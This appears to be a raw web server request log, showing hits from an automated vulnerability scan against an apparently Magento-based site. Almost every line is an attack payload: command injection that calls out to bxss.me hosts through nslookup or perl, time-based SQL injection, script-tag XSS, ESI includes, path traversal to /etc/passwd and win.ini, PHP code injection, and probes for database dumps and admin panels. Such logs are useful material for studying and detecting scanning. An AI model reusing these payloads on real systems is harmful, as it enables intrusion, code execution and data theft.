/acc/index.php/install/wizard/beginPost/..%2f..%2fpackage-lock.json 1 -
/&(nslookup%20hitjokwbrtpnu8deed.bxss.me||perl%20-e%20\"gethostbyname('hitjokwbrtpnu8deed.bxss.me')\")&'\\\"`0&(nslookup%20hitjokwbrtpnu8deed.bxss.me||perl%20-e%20\"gethostbyname('hitjokwbrtpnu8deed.bxss.me')\")&`'/js/prototype/ 1 -
/acc/js/mage/%3b(nslookup%20hithxknrytffc6a7bf.bxss.me||perl%20-e%20\"gethostbyname('hithxknrytffc6a7bf.bxss.me')\")|(nslookup%20hithxknrytffc6a7bf.bxss.me||perl%20-e%20\"gethostbyname('hithxknrytffc6a7bf.bxss.me')\")&(nslookup%20hithxknrytffc6a7bf.bxss.me 1 -
/&echo%20yfkfoj$()\\%20dzutwe\\nz^xyu||a%20%23'%20&echo%20yfkfoj$()\\%20dzutwe\\nz^xyu||a%20%23|\"%20&echo%20yfkfoj$()\\%20dzutwe\\nz^xyu||a%20%23/skin/frontend/ 1 -
/acc/'\"()&%25<acx><ScRiPt%20>KhMd(9981)<%2fScRiPt>/install/wizard/config/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(117).concat(74).concat(116).concat(88)+(require\"socket\"%0aSocket.gethostbyname(\"hituj\"+\"hclyjtss15146.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/events.js 1 -
/database.7z 1 -
/..%2facc/skin/install/default/default/ 1 https://104.36.149.61/
/azure-pipelines.yml 1 -
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/translate.js 1 https://104.36.149.61/
/(nslookup%20hiteooetdtwjo51bbe.bxss.me||perl%20-e%20\"gethostbyname('hiteooetdtwjo51bbe.bxss.me')\")/skin/install/default/default/css/reset.css 1 -
/acc/skin/install'\"()&%25<acx><ScRiPt%20>Lssw(9110)<%2fScRiPt>/default/default/ 1 https://104.36.149.61/
//..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 1 -
/%2fxfs.bxss.me/js/prototype/debug.js 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'VJav'!='VJav%25/js/prototype/ 1 https://104.36.149.61/
/database.zip 1 -
/)/js/prototype/validation.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/backup.js 1 -
/|echo%20ovvbfw$()\\%20sinnef\\nz^xyu||a%20%23'%20|echo%20ovvbfw$()\\%20sinnef\\nz^xyu||a%20%23|\"%20|echo%20ovvbfw$()\\%20sinnef\\nz^xyu||a%20%23/js/mage/adminhtml/flexuploader.js 1 -
/!(()&&!|*|*|/index.php/install/wizard/config/ 1 https://104.36.149.61/
/cgi-bin/.mysql_history 1 -
/package-lock.json 1 -
/'\"/js/mage/adminhtml/form.js 1 -
/acc/.%2fjs/varien/js.js 1 https://104.36.149.61/
/acc/skin/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/default/css/ie7minus.css 1 -
/acc/index.php/..%2f..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/(nslookup%20hiteldntqmmfue7929.bxss.me||perl%20-e%20\"gethostbyname('hiteldntqmmfue7929.bxss.me')\")/skin/install/default/default/ 1 -
/\"+response.write(9154441*9534260)+\"/skin/install/default/default/css/ie7minus.css 1 -
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/default/css/clears.css 1 https://104.36.149.61/
/CFIDE/administrator/index.cfm 1 -
/acc/index.php/install/wizard/config//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"HPA2\"=\"HPA2/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/install/bxss.me%2ft%2fxss.html%3f%2500/default/css/ie7minus.css 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/giftmessage.js 1 -
/$(nslookup%20hitvwcxdhdaez72cb8.bxss.me||perl%20-e%20\"gethostbyname('hitvwcxdhdaez72cb8.bxss.me')\")/js/mage/adminhtml/ 1 -
/$(nslookup%20hitulwuamusgx77ef9.bxss.me||perl%20-e%20\"gethostbyname('hitulwuamusgx77ef9.bxss.me')\")/js/prototype/prototype.js 1 -
/104_database.sql 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'2lTe'='2lTe/js/prototype/windows/ 1 https://104.36.149.61/
/backup-104.zip 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/giftoptions/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/varien/form.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/skin/install/default/default/..%2fcss/iestyles.css 1 https://104.36.149.61/
/config/database.yml.pgsql 1 -
/acc/index.php/install//./WEB-INF/web.xml%00.jsp 1 -
/cgi-bin/.bash_profile 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/cgi-bin/.hgignore 1 -
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>Lssw(9784)<%2fScRiPt>/default/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2fpackage.json 1 -
/)/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/js/12345'\"\\'\\\") 29 https://104.36.149.61/
/adminer-4.5.0.php 1 https://104.36.149.61/
/acc/js/prototype/bxss.me%2ft%2fxss.html%3f%2500/themes/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>mwZT(9006)<%2fScRiPt>/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/cgi-bin/package.json 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/backup.js 1 -
/acc//mage/adminhtml/accordion.js 1 https://104.36.149.61/
/loader-wizard.php 1 -
/html/js/editor/fckeditor 2 -
/acc/js/mage/..%2fadminhtml/image.js 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/wysiwyg/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/debug.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini 1 -
/api/ 1 -
/)/skin/adminhtml/default/ 1 https://104.36.149.61/
/104.36.149.61-dump.sql.tar 1 -
/|(nslookup%20hitnygjvvrjcja2e53.bxss.me||perl%20-e%20\"gethostbyname('hitnygjvvrjcja2e53.bxss.me')\")/js/mage/adminhtml/product/ 1 -
/cacti/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/image.js 1 -
/acc/index.php/install/wizard//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/acc/skin/install/%2fxfs.bxss.me/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/default/ 1 -
/acc/js/mage/..%2fadminhtml/backup.js 1 https://104.36.149.61/
/l6VcoGJ1')%20OR%20912=(SELECT%20912%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/scriptaculous/%3b(nslookup%20hitvmmbfyhhwj8f6ca.bxss.me||perl%20-e%20\"gethostbyname('hitvmmbfyhhwj8f6ca.bxss.me')\")|(nslookup%20hitvmmbfyhhwj8f6ca.bxss.me||perl%20-e%20\"gethostbyname('hitvmmbfyhhwj8f6ca.bxss.me')\")&(nslookup%20hitvmmbfyhhwj8f6c 1 -
/acc/js/prototype/windows/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/xCLZD7pd'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/config/ 1 https://104.36.149.61/
/${@print(md5(31337))}/skin/adminhtml/default/ 1 -
/phpMyAdmin2/ 1 -
/104.sql.tar 1 -
/cgi-bin/../../../../bin/sh 12 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2fGemfile 1 -
/acc/%2fxfs.bxss.me/mage/adminhtml/hash.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/flexuploader.js 1 https://104.36.149.61/
/phpMoAdmin/moadmin.php 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/extended_debug.js 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/sales/ 1 -
/acc/skin/install/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/css/ie7minus.css 1 -
//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/default/ 1 https://104.36.149.61/
/acc/skin/install/default<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/ 1 -
/'%3bprint(md5(31337))%3b$a='/skin/install/default/default/css/reset.css 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"4pV8\"=\"4pV8/js/varien/form.js 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/effects.js 1 -
/&echo%20fyhhtw$()\\%20orzpbc\\nz^xyu||a%20%23'%20&echo%20fyhhtw$()\\%20orzpbc\\nz^xyu||a%20%23|\"%20&echo%20fyhhtw$()\\%20orzpbc\\nz^xyu||a%20%23/skin/install/default/default/ 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/uploader/ 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(103).concat(76).concat(108).concat(70)+(require\"socket\"%0aSocket.gethostbyname(\"hitpq\"+\"qbunsfflee3d1.bxss.me.\")[3].to_s)+\"/js/varien/form.js 1 -
/-1%20OR%203+885-885-1=0+0+0+1/js/prototype/windows/themes/ 1 https://104.36.149.61/
/'%3bprint(md5(31337))%3b$a='/skin/adminhtml/ 1 -
/database.rar 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/index.php/install/ 1 https://104.36.149.61/
/acc/js/prototype/'\"()&%25<acx><ScRiPt%20>ll2Q(9552)<%2fScRiPt>.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/flexuploader.js 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/GLGb3OQC'%20OR%2022=(SELECT%2022%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/index.php/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/wizard/config/ 1 https://104.36.149.61/
/|(nslookup%20hitfprpmhpjnpa9087.bxss.me||perl%20-e%20\"gethostbyname('hitfprpmhpjnpa9087.bxss.me')\")/js/prototype/ 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>XkUp(9846)<%2fScRiPt>/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/install/wizard/locale/ 1 -
/`(nslookup%20hitcpzhahuvej0bece.bxss.me||perl%20-e%20\"gethostbyname('hitcpzhahuvej0bece.bxss.me')\")`/js/mage/adminhtml/flexuploader.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/install/default/ 1 https://104.36.149.61/
/acc/skin/install/default/default'\"()&%25<acx><ScRiPt%20>Ijhk(9731)<%2fScRiPt>/css/boxes.css 1 https://104.36.149.61/
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/default/css/boxes.css 1 -
/test/actuator 1 -
/acc/js/mage/%3b(nslookup%20hithlycnrpwhpda204.bxss.me||perl%20-e%20\"gethostbyname('hithlycnrpwhpda204.bxss.me')\")|(nslookup%20hithlycnrpwhpda204.bxss.me||perl%20-e%20\"gethostbyname('hithlycnrpwhpda204.bxss.me')\")&(nslookup%20hithlycnrpwhpda204.bxss.me 1 -
/`(nslookup%20hitfoyigjivcub2888.bxss.me||perl%20-e%20\"gethostbyname('hitfoyigjivcub2888.bxss.me')\")`/js/mage/adminhtml/ 1 -
/${@print(md5(31337))}/js/mage/adminhtml/product/ 1 -
/cgi-bin/.htaccess.old 1 -
/<!--/js/varien/js.js 1 -
/%2fxfs.bxss.me/js/prototype/extended_debug.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>ntvJ(9986)<%2fScRiPt>/js/prototype/validation.js 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/default/css/clears.css 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(122).concat(78).concat(100).concat(67)+(require'socket'%0aSocket.gethostbyname('hitlg'+'zvycorev7096b.bxss.me.')[3].to_s)+'/js/mage/adminhtml/giftoptions/ 1 -
/components/com_tipster/open-flash-chart/php-ofc-library/php-ofc-library/ofc_upload_image.php 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"ymKu\"=\"ymKu/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/..%2f..%2f..%2fweb.config 1 -
/acc/index.php/install/..%2fpackage.json 1 -
/admin/phpmyadmin/main.php 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/hash.js 1 https://104.36.149.61/
/phpMyAdmin2/main.php 1 -
/acc/%2fxfs.bxss.me/install/default/default/css/clears.css 1 -
/'%3bprint(md5(31337))%3b$a='/skin/install/default/default/ 1 -
/'\"/js/mage/adminhtml/giftmessage.js 1 -
/acc/js/mage/adminhtml/%2fxfs.bxss.me/ 1 -
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2fGemfile 1 -
/..%2fGemfile 1 -
/telescope/ 2 -
/5dwkhz8n')%20OR%20897=(SELECT%20897%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/index.php/../../Gemfile 1 -
/bxss.me/skin/install/default/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(106).concat(75).concat(122).concat(72)+(require\"socket\"%0aSocket.gethostbyname(\"hitvx\"+\"syajtaobe4ab3.bxss.me.\")[3].to_s)+\"/skin/install/default/default/css/iestyles.css 1 -
/-1%20OR%203+922-922-1=0+0+0+1/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2fpackage-lock.json 1 -
/acc/index.php/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/prototype/validation.js 1 -
/acc/js/prototype/tooltip_manager.js/938607%40 1 https://104.36.149.61/
/acc/index.php//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd 1 -
/'.gethostbyname(lc('hitif'.'shrggwoe26184.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(83).chr(121).chr(66).'/js/mage/adminhtml/image.js 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/extended_debug.js 1 https://104.36.149.61/
/-1%20OR%202+230-230-1=0+0+0+1/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/accordion.js 1 -
/1'\"/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/bxss.me/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/y9FZbgGC')%20OR%20183=(SELECT%20183%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/skin/install/default/default/%2fxfs.bxss.me/clears.css 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>ntvJ(9979)<%2fScRiPt>/validation.js 1 https://104.36.149.61/
/authenticationendpoint/new_article.jsp 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/ 1 https://104.36.149.61/
/dump.sql.gz 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"3YRN\"=\"3YRN/skin/install/default/default/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/skin/install/default/default/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/db/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/validation.js 1 -
/acc/'\"()&%25<acx><ScRiPt%20>fIWy(9281)<%2fScRiPt>/prototype/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/flexuploader.js 1 https://104.36.149.61/
/RLef87ZR/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js'\"()&%25<acx><ScRiPt%20>ja2b(9548)<%2fScRiPt>/prototype/tooltip_manager.js 1 https://104.36.149.61/
/acc/js/prototype'\"()&%25<acx><ScRiPt%20>ll2Q(9924)<%2fScRiPt>/prototype.js 1 https://104.36.149.61/
/acc/skin/frontend/./WEB-INF/web.xml%00.jsp 2 -
/(nslookup%20hitfvmjmjajfzd30dc.bxss.me||perl%20-e%20\"gethostbyname('hitfvmjmjajfzd30dc.bxss.me')\")/js/varien/js.js 1 -
/'.print(md5(31337)).'/js/mage/adminhtml/image.js 1 -
/\"976871%40 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/skin/install/default/12345'\"\\'\\\") 6 https://104.36.149.61/
/JOXLgIcz')%20OR%2057=(SELECT%2057%20FROM%20PG_SLEEP(15))--/js/prototype/debug.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//../../../WEB-INF/web.xml%00.jsp 1 -
/104-dump.tar.gz 1 -
/acc/index.php/install/wizard//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/prototype.js 1 -
/reports/rwservlet 1 -
/acc/js/..%2fmage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2fpackage-lock.json 1 -
/acc/..%2fskin/adminhtml/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/adminhtml/default/ 1 https://104.36.149.61/
/.%2facc/js/varien/js.js 1 https://104.36.149.61/
/phpinfo.php 1 -
/acc/skin/adminhtml/%2fxfs.bxss.me/ 1 -
/acc/index.php/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/wizard/locale/ 1 -
/.%2facc/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/dnxjrhonhq 1 -
//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 -
/|(nslookup%20hitunxewjbpbyb4855.bxss.me||perl%20-e%20\"gethostbyname('hitunxewjbpbyb4855.bxss.me')\")/index.php/install/ 1 -
/acc/index.php/install/wizard/config/..%2f..%2fGemfile 1 -
/acc/skin/%3b(nslookup%20hitjeywuhymieff563.bxss.me||perl%20-e%20\"gethostbyname('hitjeywuhymieff563.bxss.me')\")|(nslookup%20hitjeywuhymieff563.bxss.me||perl%20-e%20\"gethostbyname('hitjeywuhymieff563.bxss.me')\")&(nslookup%20hitjeywuhymieff563.bxss.me||p 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/tooltip.js 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>kUNn(9013)<%2fScRiPt>/adminhtml/sales/ 1 https://104.36.149.61/
/telescope/requests 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js.js 1 https://104.36.149.61/
/104-dump.tgz 1 -
/'+'A'.concat(70-3).concat(22*4).concat(118).concat(69).concat(109).concat(76)+(require'socket'%0aSocket.gethostbyname('hitir'+'gbfxuncv370d6.bxss.me.')[3].to_s)+'/js/prototype/extended_debug.js 1 -
/acc/js/%2fxfs.bxss.me/windows/ 1 -
/inHKlDv8'%20OR%20867=(SELECT%20867%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/ 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hittw\".\"wxwpiihuda47e.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(119).chr(84).chr(114).chr(69).\"/js/prototype/tooltip.js 1 -
/acc/index.php/.%2finstall/wizard/locale/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/windows/ 1 -
/bxss.me/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/hash.js 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/reset.css 1 -
/HhaNro8z/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/ 1 https://104.36.149.61/
/\"+response.write(9493101*9558622)+\"/skin/install/default/default/css/boxes.css 1 -
/acc/skin/.%2fadminhtml/default/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hitxm'.'ehqfrulycb870.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(81).chr(98).chr(72).'/js/mage/adminhtml/backup.js 1 -
/acc/js/%2fxfs.bxss.me/effects.js 1 -
/${10000457+9999808}/index.php/install/wizard/locale/ 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/varien/form.js 1 https://104.36.149.61/
/|(nslookup%20hitrckkqwynqs42862.bxss.me||perl%20-e%20\"gethostbyname('hitrckkqwynqs42862.bxss.me')\")/js/prototype/extended_debug.js 1 -
/phpunit/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 -
/acc/js/scriptaculous/1%00%c0%a7%c0%a2%252527%252522.js 1 https://104.36.149.61/
/104db.tar.gz 1 -
//./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 2 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>gf47(9329)<%2fScRiPt>/adminhtml/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>yxiC(9789)<%2fScRiPt>/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/varien/%2fxfs.bxss.me.js 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>KYzi(9766)<%2fScRiPt>/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/product/ 1 -
/`(nslookup%20hitspuzpntgkx599c6.bxss.me||perl%20-e%20\"gethostbyname('hitspuzpntgkx599c6.bxss.me')\")`/js/mage/adminhtml/grid.js 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(115).concat(89).concat(99).concat(75)+(require\"socket\"%0aSocket.gethostbyname(\"hitoz\"+\"wywarism46cb6.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/flexuploader.js 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js.js 1 https://104.36.149.61/
/XR593skn'%20OR%20432=(SELECT%20432%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/prototype/prototype.js 1 https://104.36.149.61/
/104.36.149.61-backup.sql.gz 1 -
/$(nslookup%20hitdvfgwqolwg66f94.bxss.me||perl%20-e%20\"gethostbyname('hitdvfgwqolwg66f94.bxss.me')\")/skin/install/default/default/css/reset.css 1 -
/acc9847528/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/adminer-4.4.0.php 1 https://104.36.149.61/
/xmlrpc_server.php 4 -
/xmlrpc/soap.php 4 -
/acc'||'/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale/../../../../../package-lock.json 1 -
/dbdump.sql 1 -
//database.php 1 -
/91TVw9h2'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/windows/themes/ 1 https://104.36.149.61/
/config/ 1 -
/acc/js/mage/adminhtml/12345'\"\\'\\\") 2 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/tooltip_manager.js 1 -
/Http://bxss.me/t/fit.txt/js/prototype/tooltip.js 1 https://104.36.149.61/
/104-database.tar.gz 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/grid.js 1 https://104.36.149.61/
/echo%20yqleri$()\\%20ownatg\\nz^xyu||a%20%23'%20&echo%20yqleri$()\\%20ownatg\\nz^xyu||a%20%23|\"%20&echo%20yqleri$()\\%20ownatg\\nz^xyu||a%20%23/js/prototype/extended_debug.js 1 -
/acc/skin/..%2finstall/default/default/css/reset.css 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitwy\".\"sundpkqo46118.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(104).chr(71).chr(99).chr(82).\"/js/mage/adminhtml/form.js 1 -
/&echo%20fchjbl$()\\%20iirnli\\nz^xyu||a%20%23'%20&echo%20fchjbl$()\\%20iirnli\\nz^xyu||a%20%23|\"%20&echo%20fchjbl$()\\%20iirnli\\nz^xyu||a%20%23/js/prototype/windows/themes/ 1 -
/Yj3TNniD'))%20OR%20453=(SELECT%20453%20FROM%20PG_SLEEP(15))--/skin/frontend/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/prototype.js 1 -
/inexistent_file_name.inexistent0123450987.cfm 1 -
/|echo%20bkixla$()\\%20gpcsmy\\nz^xyu||a%20%23'%20|echo%20bkixla$()\\%20gpcsmy\\nz^xyu||a%20%23|\"%20|echo%20bkixla$()\\%20gpcsmy\\nz^xyu||a%20%23/skin/install/default/default/ 1 -
/`(nslookup%20hitttqdgjrbph3c7c8.bxss.me||perl%20-e%20\"gethostbyname('hitttqdgjrbph3c7c8.bxss.me')\")`/js/scriptaculous/effects.js 1 -
